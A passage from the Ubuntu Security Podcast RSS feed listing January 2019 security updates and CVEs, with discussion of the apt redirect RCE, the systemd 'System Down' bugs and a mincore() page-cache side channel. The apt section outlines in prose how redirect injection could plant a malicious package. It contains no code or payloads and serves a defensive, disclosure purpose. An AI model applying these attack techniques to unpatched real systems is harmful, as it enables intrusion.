<li><a href="https://ubuntu.com/security/CVE-2018-15127">CVE-2018-15127</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15126">CVE-2018-15126</a></li>
</ul>
</li>
<li>Various memory management issues:
<ul>
<li>Heap UAF -&gt; crash -&gt; DoS, possible RCE in server from malicious client</li>
<li>Heap OOB write (incomplete fix for previous CVE-2018-15127) - crash -&gt; DoS, possible RCE</li>
<li>Multiple heap OOB writes in client (incomplete fix for previous CVE-2018-20019)</li>
<li>NULL pointer dereferences in client -&gt; crash -&gt; DoS</li>
<li>Failure to properly initialise structures on stack -&gt; info leak, possible ASLR bypass (disclose stack memory layout)</li>
<li>Infinite loop in client -&gt; DoS</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="an-update-on-mincore">An update on mincore()</h3>
<ul>
<li>In <a href="https://ubuntusecuritypodcast.org/episode-17/">Episode 17</a> discussed changes to mincore() mitigate page cache side-channel attack</li>
<li>Linus Torvalds committed a change to change the behaviour of mincore() to mitigate the vulnerability</li>
<li><a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=30bac164aca750892b93eef350439a0562a68647">Recently reverted that change</a> citing too much breakage to existing users:
<ul>
<li>In particular Netflix have a use-case where they dump page cache across processes to aid in migration of Cassandra workloads across machines</li>
</ul>
</li>
<li>Instead an alternate approach to limit cache residency reporting only to processes which have write access to the particular file in question
<ul>
<li>ie. so if a process has write access to a file which it has open for writing it will be able to read back from mincore() which pages are mapped in the cache and which are not - so will still work for the Netflix and others case of databases wanting to know which pages are mapped or not from disk</li>
<li>will stop the case of being able to know which pages of shared system libraries etc are mapped and hence stop the original side-channel attack</li>
<li><a href="https://git.kernel.org/pub/scm/linux/kernel/git/jikos/jikos.git/log/?h=pagecache-sidechannel-v2">patches not yet submitted for mm tree or others but should be soon</a></li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E019.mp3" length="14236655" type="audio/mpeg" /><itunes:duration>14:49</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 18
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-18/</link>
          <pubDate>Tue, 29 Jan 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E018.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 18</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at some details of the 46 unique CVEs addressed across the supported Ubuntu releases and take a deep dive into the recent apt security bug.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at some details of the 46 unique CVEs addressed across the supported Ubuntu releases and take a deep dive into the recent apt security bug.</itunes:summary>
        <description>This week we look at some details of the 46 unique CVEs addressed across the supported Ubuntu releases and take a deep dive into the recent apt security bug.</description>
        <googleplay:description>This week we look at some details of the 46 unique CVEs addressed across the supported Ubuntu releases and take a deep dive into the recent apt security bug.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 46 unique CVEs addressed across the supported Ubuntu releases and take a deep dive into the recent apt security bug.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>46 unique CVEs addressed</p>
<h3 id="usn-3863-1-usn-3863-2-apt-vulnerability">[<a href="https://usn.ubuntu.com/3863-1/">USN-3863-1</a>, <a href="https://usn.ubuntu.com/3863-2/">USN-3863-2</a>] APT vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3462">CVE-2019-3462</a></li>
</ul>
</li>
<li>MITM allowing RCE as root in the context of apt</li>
<li>Due to mishandling of HTTP redirect which would allow malicious mirror / MITM to inject content and then could allow arbitrary command execution</li>
<li>Fixed by simply disallowing control characters in HTTP redirect responses
<ul>
<li>See detailed discussion later in show</li>
</ul>
</li>
</ul>
<h3 id="usn-3864-1-libtiff-vulnerabilities">[<a href="https://usn.ubuntu.com/3864-1/">USN-3864-1</a>] LibTIFF vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-8905">CVE-2018-8905</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7456">CVE-2018-7456</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18661">CVE-2018-18661</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18557">CVE-2018-18557</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17101">CVE-2018-17101</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17100">CVE-2018-17100</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10963">CVE-2018-10963</a></li>
</ul>
</li>
<li>Multiple NULL pointer dereferences and assertion failures (crash -&gt; DoS)</li>
<li>Multiple heap-based buffer overflows and an integer overflow (crash -&gt; DoS / possible RCE)</li>
</ul>
<h3 id="usn-3865-1-poppler-vulnerabilities">[<a href="https://usn.ubuntu.com/3865-1/">USN-3865-1</a>] poppler vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20650">CVE-2018-20650</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20481">CVE-2018-20481</a></li>
</ul>
</li>
<li>Assertion failure and NULL pointer dereference triggered by crafted PDFs (crash -&gt; DoS)</li>
</ul>
<h3 id="usn-3707-2-ntp-vulnerabilities">[<a href="https://usn.ubuntu.com/3707-2/">USN-3707-2</a>] NTP vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-7185">CVE-2018-7185</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7183">CVE-2018-7183</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6463">CVE-2017-6463</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6462">CVE-2017-6462</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9311">CVE-2016-9311</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9310">CVE-2016-9310</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7428">CVE-2016-7428</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7427">CVE-2016-7427</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7426">CVE-2016-7426</a></li>
</ul>
</li>
<li>NTP updated for Bionic, Artful, Xenial and Trusty in July 2018 - this is the corresponding update for Precise ESM</li>
<li>Multiple issues including: RCE in ntpq from a crafted response from
the server, various DoS at both protocol level between client and
server (disrupt a client talking to server) and at application level
(to crash the application)</li>
</ul>
<h3 id="usn-3866-1-ghostscript-vulnerability">[<a href="https://usn.ubuntu.com/3866-1/">USN-3866-1</a>] Ghostscript vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6116">CVE-2019-6116</a></li>
</ul>
</li>
<li>Another week, another Ghostscript vulnerability courtesy of Tavis Ormandy (GPZ) (after a random look at the latest GS release 9.26)
<ul>
<li>See Episodes 5, 7, 10, 14 for more</li>
</ul>
</li>
<li>Code execution via subroutine operators
<ul>
<li>Patches to fix quite invasive</li>
</ul>
</li>
<li>Ghostscript is included in evince, ImageMagick, nautilus, GIMP, even less so able to target various commands to exploit</li>
</ul>
<h3 id="usn-3867-1-mysql-vulnerabilities">[<a href="https://usn.ubuntu.com/3867-1/">USN-3867-1</a>] MySQL vulnerabilities</h3>
<ul>
<li>15 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2537">CVE-2019-2537</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2534">CVE-2019-2534</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2532">CVE-2019-2532</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2531">CVE-2019-2531</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2529">CVE-2019-2529</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2528">CVE-2019-2528</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2510">CVE-2019-2510</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2507">CVE-2019-2507</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2503">CVE-2019-2503</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2486">CVE-2019-2486</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2482">CVE-2019-2482</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2481">CVE-2019-2481</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2455">CVE-2019-2455</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2434">CVE-2019-2434</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2420">CVE-2019-2420</a></li>
</ul>
</li>
<li>Updated to latest MySQL version (5.7.25) in all releases to fix numerous issues including:
<ul>
<li>Multiple DoS via low privileged attacker, multiple unauthorized access to complete MySQL server data etc</li>
</ul>
</li>
</ul>
<h3 id="usn-3869-1-subversion-vulnerability">[<a href="https://usn.ubuntu.com/3869-1/">USN-3869-1</a>] Subversion vulnerability</h3>
<ul>
<li>1 CVEs addressed in Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-11803">CVE-2018-11803</a></li>
</ul>
</li>
<li>DoS against Subversion server (mod_dav_svn) (only affects 1.10.0+ -&gt; Cosmic)</li>
<li>Triggered by listing remote recursive directory contents BUT not
providing the path to list - NULL pointer dereference -&gt; crash</li>
</ul>
<h3 id="usn-3868-1-thunderbird-vulnerabilities">[<a href="https://usn.ubuntu.com/3868-1/">USN-3868-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18498">CVE-2018-18498</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18494">CVE-2018-18494</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18493">CVE-2018-18493</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18492">CVE-2018-18492</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17466">CVE-2018-17466</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12405">CVE-2018-12405</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12393">CVE-2018-12393</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12392">CVE-2018-12392</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12390">CVE-2018-12390</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12389">CVE-2018-12389</a></li>
</ul>
</li>
<li>Latest Thunderbird release (60.4) to resolve multiple issues</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h2 id="apt-apt-get-rce--cve-2019-3462">apt / apt-get RCE (CVE-2019-3462)</h2>
<ul>
<li>Discovered by Max Justicz (<a href="//justi.cz/security/2019/01/22/apt-rce.html">provides a detailed write-up on his blog</a>)</li>
<li>apt uses worker processes which communicate back to the main process when fetching content
<ul>
<li>workers get told what to download and where to put it and communicate back with parent via stdin/stdout</li>
<li>protocol is like HTTP, human readable text</li>
<li>can include directives from workers regarding redirects, completion (DONE) etc</li>
<li>when handling a HTTP Redirect from the server, apt http worker would append this contents in message sent back to parent
<ul>
<li>expect just a URI as the redirect content but could be anything - so could contain directives in the apt worker protocol which then get interpreted by the main apt process</li>
<li>so could signal DONE to parent <strong>as well</strong> as follow-up directives such as reporting false hashes for debs or even falsifying the location of the deb on the filesystem</li>
<li>So could use the Releases.gpg file as the location of the package on the filesystem - and actually inject our malicious package into the start of Releases.gpg - with trusted Releases.gpg content afterwards</li>
<li>Releases.gpg will still validate (since it ignores junk at the start) AND apt will still use the package since it will ignore the signature at the end</li>
<li>So can get malicious package installed - which due to debian packaging can run scripts on install etc and hence get RCE as root :(</li>
</ul>
</li>
</ul>
</li>
<li>Fixed by simply disallowing control characters in HTTP redirect responses</li>
<li>If we assume the mirrors are trusted, could have been mitigated via HTTPS
<ul>
<li>Since HTTPS would stop MITM attacks</li>
<li>Some Ubuntu mirrors offer HTTPS but this is not enabled by default since not <strong>all</strong> mirrors offer HTTPS</li>
<li>Official mirrors do not currently offer HTTPS - this is being reevaluated but is difficult for a number of reasons</li>
<li>Users can still easily enable HTTPS themselves by choosing an appropriate mirror with a HTTPS URI</li>
</ul>
</li>
<li>If assume mirrors are untrusted then they could still have exploited this
<ul>
<li>So whilst HTTPS could help in this case is not a panacea</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E018.mp3" length="13886823" type="audio/mpeg" /><itunes:duration>14:27</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 17
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-17/</link>
          <pubDate>Tue, 22 Jan 2019 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E017.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 17</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          First episode of 2019! This week we look "System Down" in systemd, as well as updates for the Linux kernel, GnuPG, PolicyKit and more, and discuss a recent cache-side channel attack using the mincore() system call.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  First episode of 2019! This week we look "System Down" in systemd, as well as updates for the Linux kernel, GnuPG, PolicyKit and more, and discuss a recent cache-side channel attack using the mincore() system call.
  </itunes:summary>
        <description>  First episode of 2019! This week we look "System Down" in systemd, as well as updates for the Linux kernel, GnuPG, PolicyKit and more, and discuss a recent cache-side channel attack using the mincore() system call.
  </description>
        <googleplay:description>  First episode of 2019! This week we look "System Down" in systemd, as well as updates for the Linux kernel, GnuPG, PolicyKit and more, and discuss a recent cache-side channel attack using the mincore() system call.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>First episode of 2019! This week we look &ldquo;System Down&rdquo; in systemd, as well as updates for the Linux kernel, GnuPG, PolicyKit and more, and discuss a recent cache-side channel attack using the mincore() system call.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>51 unique CVEs addressed across the supported Ubuntu releases.</p>
<h3 id="usn-3846-1-usn-3847-1-usn-3847-2-usn-3847-3-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3846-1/">USN-3846-1</a>, <a href="https://usn.ubuntu.com/3847-1/">USN-3847-1</a>, <a href="https://usn.ubuntu.com/3847-2/">USN-3847-2</a>, USN-3847-3] Linux kernel vulnerabilities</h3>
<ul>
<li>Kernel updates as part of normal 3-weekly SRU cycle - includes various fixes across the supported releases
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18710">CVE-2018-18710</a> (Cosmic, Bionic, Bionic HWE, Xenial, Xenial HWE, Trusty, Trusty HWE)</li>
<li><a href="https://ubuntu.com/security/CVE-2018-18690">CVE-2018-18690</a> (Bionic, Bionic HWE, Xenial, Xenial HWE, Trusty, Trusty HWE)</li>
<li><a href="https://ubuntu.com/security/CVE-2018-18445">CVE-2018-18445</a> (Bionic, Bionic HWE)</li>
<li><a href="https://ubuntu.com/security/CVE-2018-16276">CVE-2018-16276</a> (Bionic, Bionic HWE)</li>
<li><a href="https://ubuntu.com/security/CVE-2018-14734">CVE-2018-14734</a> (Bionic, Bionic HWE)</li>
<li><a href="https://ubuntu.com/security/CVE-2018-12896">CVE-2018-12896</a> (Bionic, Bionic HWE, Xenial, Xenial HWE, Trusty, Trusty HWE)</li>
<li><a href="https://ubuntu.com/security/CVE-2017-18174">CVE-2017-18174</a> (Xenial, Xenial HWE)</li>
<li><a href="https://ubuntu.com/security/CVE-2018-10902">CVE-2018-10902</a> (Trusty, Trusty HWE)</li>
<li><a href="https://ubuntu.com/security/CVE-2017-2647">CVE-2017-2647</a> (Trusty, Trusty HWE)</li>
</ul>
</li>
<li>Info leak in CDROM driver, XFS DoS via writing of extended attributes causing an error condition that leaves the fs in an error state until next mount</li>
<li>Bounds check bypass in BPF verifier (mentioned in Episode 15)</li>
<li>Incorrect bounds checking in Yurex USB driver (Episode 7)</li>
<li>UAF in infiniband -&gt; Crash -&gt; DoS</li>
<li>Integer overflow in POSIX timers overrun accounting due to type confusion (int vs 64-bit signed)</li>
<li>Double free in AMD GPIO pinctrl driver - DoS / privilege escalation</li>
<li>Race condition in midi driver - double free -&gt; privilege escalation</li>
<li>NULL pointer dereference in kernel keyring -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="lsn-0046-1-linux-kernel-livepatch-for-vulnerabilities">[LSN-0046-1] Linux kernel livepatch for vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16658">CVE-2018-16658</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16276">CVE-2018-16276</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-5753">CVE-2017-5753</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9363">CVE-2018-9363</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18690">CVE-2018-18690</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10880">CVE-2018-10880</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14734">CVE-2018-14734</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18445">CVE-2018-18445</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10902">CVE-2018-10902</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18710">CVE-2018-18710</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3850-1-nss-vulnerabilities">[<a href="https://usn.ubuntu.com/3850-1/">USN-3850-1</a>] NSS vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-12404">CVE-2018-12404</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12384">CVE-2018-12384</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-0495">CVE-2018-0495</a></li>
</ul>
</li>
<li>Cache side-channel variant of Bleichenbacher attack (<a href="http://cat.eyalro.net/">http://cat.eyalro.net/</a>)</li>
<li>Responds to SSLv2 ClientHello with a ServerHello with all zero random</li>
<li>Cache side-channel attack on ECDSA signatures (Trusty only)</li>
</ul>
<h3 id="usn-3851-1-django-vulnerability">[<a href="https://usn.ubuntu.com/3851-1/">USN-3851-1</a>] Django vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3498">CVE-2019-3498</a></li>
</ul>
</li>
<li>Attacker could craft a malicious URL to make spoofed content appear on the generated 404 page</li>
</ul>
<h3 id="usn-3852-1-exiv2-vulnerabilities">[<a href="https://usn.ubuntu.com/3852-1/">USN-3852-1</a>] Exiv2 vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-17581">CVE-2018-17581</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16336">CVE-2018-16336</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17669">CVE-2017-17669</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14864">CVE-2017-14864</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14862">CVE-2017-14862</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14859">CVE-2017-14859</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11683">CVE-2017-11683</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11591">CVE-2017-11591</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9239">CVE-2017-9239</a></li>
</ul>
</li>
<li>Infinite recursion leading to stack exhaustion -&gt; crash -&gt; DoS</li>
<li>Multiple heap based buffer out-of-bounds reads -&gt; crash -&gt; DoS</li>
<li>Multiple invalid pointer dereferences -&gt; crash -&gt; DoS</li>
<li>Invalid assertion, NULL pointer dereference -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-3853-1-gnupg-vulnerability">[<a href="https://usn.ubuntu.com/3853-1/">USN-3853-1</a>] GnuPG vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000858">CVE-2018-1000858</a></li>
</ul>
</li>
<li>GnuPG includes support for Web Key Directories (WKD) to allow easy discovery of public keys via HTTPS</li>
<li>Allows a key to be imported from a webserver -&gt; first need to lookup hostname via DNS SRV</li>
<li>Fails to sanitize response - so performs an attacker controlled, arbitrary HTTPS GET request
<ul>
<li>Attacker needs to construct a malicious SRV record for the domain in question</li>
</ul>
</li>
<li>Possible CSRF, content injection etc</li>
<li>Thunderbird will automatically use WKD via GnuPG to lookup missing keys so allows easy exploitation</li>
</ul>
<h3 id="usn-3854-1-webkitgtk-plus-vulnerabilities">[<a href="https://usn.ubuntu.com/3854-1/">USN-3854-1</a>] WebKitGTK+ vulnerabilities</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-4437">CVE-2018-4437</a></li>
</ul>
</li>
<li>Possible RCE via invalid processing of crafted web content (as usual limited details on WebKitGTK vulnerabilities&hellip;)</li>
</ul>
<h3 id="usn-3855-1-systemd-vulnerabilities">[<a href="https://usn.ubuntu.com/3855-1/">USN-3855-1</a>] systemd vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16866">CVE-2018-16866</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16865">CVE-2018-16865</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16864">CVE-2018-16864</a></li>
</ul>
</li>
<li>&ldquo;System Down&rdquo; systemd vulnerabilities</li>
<li>Chris Coulson put in a heroic effort and patched quickly - Ubuntu first affected distro to release patched systemd</li>
<li>Due to use of variable length arrays on the stack, allows various fields which are attacker controlled to be overflowed</li>
<li>If overflow far enough can bypass kernel stack guard pages, and hence corrupt the heap</li>
<li>Possible code execution as a result (original advisory contained a PoC for i386 which gained control of the instruction pointer)</li>
<li>Can be mitigated via use of the gcc flag -fstack-clash-protection - this is now under review to be used by default in forthcoming Ubuntu releases</li>
</ul>
<h3 id="usn-3856-1-gnome-bluetooth-vulnerability">[<a href="https://usn.ubuntu.com/3856-1/">USN-3856-1</a>] GNOME Bluetooth vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-10910">CVE-2018-10910</a></li>
</ul>
</li>
<li>BlueZ doesn&rsquo;t necessarily make bluetooth device undiscoverable automatically after timeout</li>
<li>Hence after enabling discovery would then still be discoverable even though user expectation is that is not anymore</li>
<li>Actual bug then is really in BlueZ but now added a workaround in GNOME bluetooth to manually disable discovery</li>
</ul>
<h3 id="usn-3857-1-pear-vulnerability">[<a href="https://usn.ubuntu.com/3857-1/">USN-3857-1</a>] PEAR vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000888">CVE-2018-1000888</a></li>
</ul>
</li>
<li>PHP Extension and Application Repository - possible RCE when deserialising via PHP object injection</li>
<li>Triggered when unpacking a PHAR (PHP ARchive) - also possible to sneak one into a JPEG so easy to exploit - just need image upload (Wordpress etc)</li>
</ul>
<h3 id="usn-3858-1-haproxy-vulnerabilities">[<a href="https://usn.ubuntu.com/3858-1/">USN-3858-1</a>] HAProxy vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20615">CVE-2018-20615</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20103">CVE-2018-20103</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20102">CVE-2018-20102</a></li>
</ul>
</li>
<li>Popular load balancing reverse proxy (used in OpenStack etc.)</li>
<li>Infinite recursion from a pointer referencing itself or from long chains of pointers -&gt; stack exhaustion -&gt; crash -&gt; DoS</li>
<li>Out-of-bounds read when validating DNS responses - information disclosure of 16 bytes</li>
<li>Fail to ensure valid length of H2 HEADERS when decoding - out-of-bounds read -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-3859-1-libarchive-vulnerabilities">[<a href="https://usn.ubuntu.com/3859-1/">USN-3859-1</a>] libarchive vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-14502">CVE-2017-14502</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000878">CVE-2018-1000878</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000877">CVE-2018-1000877</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000880">CVE-2018-1000880</a></li>
</ul>
</li>
<li>Out-of-bounds read for UTF-16 names in RAR archives</li>
<li>UAF and double free in RAR decoder - crash -&gt; DoS, possible RCE</li>
<li>Quasi-infinite runtime and disk usage from a tiny crafted WARC file (Web Archive format for storing results of crawling websites)</li>
</ul>
<h3 id="usn-3860-1-usn-3860-2-libcaca-vulnerabilities">[<a href="https://usn.ubuntu.com/3860-1/">USN-3860-1</a>, USN-3860-2] libcaca vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20549">CVE-2018-20549</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20547">CVE-2018-20547</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20546">CVE-2018-20546</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20549">CVE-2018-20549</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20548">CVE-2018-20548</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20545">CVE-2018-20545</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20544">CVE-2018-20544</a></li>
</ul>
</li>
<li>Library and utils for handling colour ASCII art (used by various media players to show videos in a terminal etc)</li>
<li>Various issues - OOB reads, writes and a floating point exception -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-3861-1-usn-3861-2-policykit-vulnerability">[<a href="https://usn.ubuntu.com/3861-1/">USN-3861-1</a>, USN-3861-2] PolicyKit vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19788">CVE-2018-19788</a></li>
</ul>
</li>
<li>Invalid handling of UID &gt; INT_MAX - would allow a user to bypass policy and execute any systemctl command</li>
</ul>
<h3 id="usn-3862-1-irssi-vulnerability">[<a href="https://usn.ubuntu.com/3862-1/">USN-3862-1</a>] Irssi vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5882">CVE-2019-5882</a></li>
</ul>
</li>
<li>UAF when expiring hidden lines from the scroll buffer</li>
</ul>
<h2 id="goings-on-in-ubuntu-and-linux-security-community">Goings on in Ubuntu and Linux Security Community</h2>
<h3 id="new-page-cache-side-channel-attack-via-mincore">New page cache side-channel attack via mincore()</h3>
<ul>
<li>Discovered by a team of researchers including some of those who found Spectre / Meltdown
<ul>
<li><a href="https://arxiv.org/pdf/1901.01161.pdf">https://arxiv.org/pdf/1901.01161.pdf</a></li>
</ul>
</li>
<li>Uses mincore() system call on Linux to determine if pages exist in the page cache or not</li>
<li>mincore() returns a bitmask of which pages are mapped in the cache for the requested range</li>
<li>Can use this side-channel to either:
<ul>
<li>determine when a process calls a given function in a shared library (since the library will be mapped at the same address in both the attack and victim process)
<ul>
<li>need to first evict the given page from the cache which is difficult but authors propose a new efficient mechanism to do this</li>
<li>can then do things like UI redressing etc in response</li>
</ul>
</li>
<li>Or can use this is a covert channel to leak information from one process to another</li>
<li>Can even use over the network to leak information via an innocent webserver etc</li>
</ul>
</li>
